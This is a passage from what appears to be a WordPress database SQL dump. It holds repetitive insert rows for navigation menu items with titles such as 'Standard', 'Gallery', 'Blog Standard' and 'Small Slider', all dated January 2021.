19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1704,NULL,NULL,3853,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1705,NULL,NULL,3854,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1706,NULL,NULL,3855,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1707,NULL,NULL,3856,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1708,NULL,NULL,3857,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1709,NULL,NULL,3858,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1710,NULL,NULL,3859,'post','nav_menu_item',1,0,NULL,NULL,'Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1711,NULL,NULL,3860,'post','nav_menu_item',1,0,NULL,NULL,'Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1712,NULL,NULL,3861,'post','nav_menu_item',1,0,NULL,NULL,'Link','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1713,NULL,NULL,3862,'post','nav_menu_item',1,0,NULL,NULL,'Quote','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1714,NULL,NULL,3863,'post','nav_menu_item',1,0,NULL,NULL,'Video','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1715,NULL,NULL,3864,'post','nav_menu_item',1,0,NULL,NULL,'Audio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1716,NULL,NULL,3865,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1717,NULL,NULL,3866,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1718,NULL,NULL,3867,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1719,NULL,NULL,3868,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1720,NULL,NULL,3869,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1721,NULL,NULL,3870,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1722,NULL,NULL,3871,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1723,NULL,NULL,3872,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1724,NULL,NULL,3873,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1725,NULL,NULL,3874,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1726,NULL,NULL,3875,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1727,NULL,NULL,3876,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1728,NULL,NULL,3877,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1729,NULL,NULL,3878,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1730,NULL,NULL,3879,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1731,NULL,NULL,3880,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1732,NULL,NULL,3881,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1733,NULL,NULL,3882,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1734,NULL,NULL,3883,'post','nav_menu_item',1,0,NULL,NULL,'Blog Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1735,NULL,NULL,3884,'post','nav_menu_item',1,0,NULL,NULL,'Blog Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1736,NULL,NULL,3885,'post','nav_menu_item',1,0,NULL,NULL,'Blog Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1737,NULL,NULL,3886,'post','nav_menu_item',1,0,NULL,NULL,'Blog Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1738,NULL,NULL,3887,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1739,NULL,NULL,3888,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1740,NULL,NULL,3889,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1741,NULL,NULL,3890,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1742,NULL,NULL,3891,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1743,NULL,NULL,3892,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1744,NULL,NULL,3893,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1745,NULL,NULL,3894,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1746,NULL,NULL,3895,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1747,NULL,NULL,3896,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1748,NULL,NULL,3897,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1749,NULL,NULL,3898,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1750,NULL,NULL,3899,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1751,NULL,NULL,3900,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1752,NULL,NULL,3901,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1753,NULL,NULL,3902,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1754,NULL,NULL,3903,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1755,NULL,NULL,3904,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1756,NULL,NULL,3905,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1757,NULL,NULL,3906,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1758,NULL,NULL,3907,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1759,NULL,NULL,3908,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1760,NULL,NULL,3909,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1761,NULL,NULL,3910,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1762,NULL,NULL,3911,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1763,NULL,NULL,3912,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1764,NULL,NULL,3913,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1765,NULL,NULL,3914,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1766,NULL,NULL,3915,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1767,NULL,NULL,3916,'post','nav_menu_item',1,0,NULL,NULL,'Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1768,NULL,NULL,3917,'post','nav_menu_item',1,0,NULL,NULL,'Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1769,NULL,NULL,3918,'post','nav_menu_item',1,0,NULL,NULL,'Link','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1770,NULL,NULL,3919,'post','nav_menu_item',1,0,NULL,NULL,'Quote','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1771,NULL,NULL,3920,'post','nav_menu_item',1,0,NULL,NULL,'Video','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1772,NULL,NULL,3921,'post','nav_menu_item',1,0,NULL,NULL,'Audio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1773,NULL,NULL,3922,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1774,NULL,NULL,3923,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1775,NULL,NULL,3924,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1776,NULL,NULL,3925,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1777,NULL,NULL,3926,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1778,NULL,NULL,3927,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-20 17:24:41','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1779,NULL,NULL,3928,'post','nav_menu_item',1,0,NULL,NULL,'Big 